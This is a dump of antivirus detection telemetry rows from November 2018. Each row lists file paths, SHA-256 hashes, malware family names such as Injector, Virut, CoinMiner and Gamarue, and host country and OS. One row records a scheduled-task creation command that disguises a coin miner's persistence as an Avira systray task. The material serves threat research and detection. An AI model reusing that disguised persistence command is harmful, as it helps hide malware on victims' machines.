  Row(detection=Row(filename='avscan-20181102-060831-b1546207', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060831-B1546207', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054022-c2eeefac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054022-C2EEEFAC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050249-84203b03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050249-84203B03', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060947-dea1ff1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060947-DEA1FF1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054418-4f6b97a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054418-4F6B97A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053740-620ad564', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053740-620AD564', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062233-a75ae2b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062233-A75AE2B2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054329-327aa4be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054329-327AA4BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055743-2f228b42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055743-2F228B42', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051914-cf3768a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051914-CF3768A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051002-85f43819', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051002-85F43819', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051228-dd4be999', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051228-DD4BE999', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061506-9cf11c6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061506-9CF11C6D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055844-5390f917', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055844-5390F917', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051212-d3b1df1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051212-D3B1DF1C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062218-9e91d847', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062218-9E91D847', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053815-76ff4ea1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053815-76FF4EA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055827-49cc99bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055827-49CC99BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050638-0cc307d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050638-0CC307D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051257-ee50ad40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051257-EE50AD40', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:02:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062432-eeaf4e0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062432-EEAF4E0E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062248-b02c1966', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062248-B02C1966', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051327-003b2db2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051327-003B2DB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054806-d728db6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054806-D728DB6D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='1d563aca47ba0cb20387b3d8ccb65eda25a431b4b466711f0ee07f42f6785a79', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:46:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154849-793abfcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154849-793ABFCD', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:48:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-211104-3f2d7831', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-211104-3F2D7831', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:10:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185128-fff295ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_50ed1053\\AVSCAN-20181101-185117-FE74C7B1\\AVSCAN-20181101-185128-FFF295FF', filesize=512000, name='TR/Drop.Agent.coc.#M1.#R1'), hash='2e396b3e8f08784c63f4097171584d19bb30490f16c6363556ae06a7443a26b8', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:51:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160056-f391a668', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160056-F391A668', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unconfirmed 108949.crdownload', filepath='C:\\Users\\X\\Downloads\\Unconfirmed 108949.crdownload', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='\\\\\\/Create \\\\\\/F \\\\\\/TN \\\\\\"Avira_Antivirus_Systray\\\\\\" \\\\\\/XML \\\\\\"C:\\\\\\\\Program Files (x86)\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\tmp.xml\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\schtasks.exe', parentsize=179712, timestamp='2018-11-01T15:29:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154742-6dea1642', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154742-6DEA1642', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:47:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='138452618526670.acv.zzz', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\138452618526670.acv.zzz', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:32:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110736-a55d6b82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-110634-9A47DAA6\\AVSCAN-20181101-110736-A55D6B82', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:07:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ijin.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\IJIN\\IJIN.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155659-cbcdc727', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155659-CBCDC727', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='24823227c06542fdd33ad2b6ad70ecd36eb952dbae9641adb50649a3c3239e6c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\24823227C06542FDD33AD2B6AD70ECD36EB952DBAE9641ADB50649A3C3239E6C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='24823227c06542fdd33ad2b6ad70ecd36eb952dbae9641adb50649a3c3239e6c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:50:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='farm 2.exe', filepath='\\?\\J:\\العاب2\\Farm 2\\Farm 2.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='0a007ed2535090f436e5c44b70de8161a705367e494e9679e798a19a4988d635', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:07:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-211216-46c54769', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-211216-46C54769', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:12:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092120-632938ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8195652d\\AVSCAN-20181101-092016-578EC4FE\\AVSCAN-20181101-092120-632938EA', filesize=64000, name='Worm/Gamarue.ioemn.#M1.#R1'), hash='246654141534b0a4c14da86ea09218d0d9b151429341dfca15f4594b9243fc7d', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:21:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155028-89cee100', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155028-89CEE100', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105707-dfb3e284', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5602ca49\\AVSCAN-20181101-105616-D8A2F2C2\\AVSCAN-20181101-105707-DFB3E284', filesize=3484000, name='TR/Bandios.ulkkx.#M1.#R1'), hash='16159b5fe91e89cc5ef9bbac6ef6ff8a1d4f4b7ce00b1b0195e5f7fda9329853', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:57:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deldrv.exe', filepath='\\\\?\\E:\\Daiver Printer\\Canon MX328\\win\\Driver\\x86\\DrvSetup\\DelDrv.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='260b013f56ba4a552733789e20fd593da270bfac8b59df2d9617e55d6aed8965', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:36:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155332-a8ee2604', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155332-A8EE2604', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155617-c4ab46f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155617-C4AB46F8', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-15-13-53.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T11:42:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111808-30db27f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111808-30DB27F1', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:17:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110459-cd5e0bb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110459-CD5E0BB1', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:04:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183145-45670a8a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183145-45670A8A', filesize=64000, name='VBA/Dldr.Agent.qwkws.#M1.#R1'), hash='ea4492824e79af5652bb2098e31e0e857577f8853606ff9c9e7322c5251c2731', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4ba2a42940d17856606e26b2498af544ba89dcc1', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\4ba2a42940d17856606e26b2498af544ba89dcc1', filesize=2176000, name='HEUR/AGEN.1027093.#M1.#R1'), hash='98a8e3ffe96241b998cbb6b56422acb9a94c5fdf27a045e918a691891a19f9da', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:12:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsgB567.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:28:16Z'), dt=datetime.date(2018, 11, 1)),
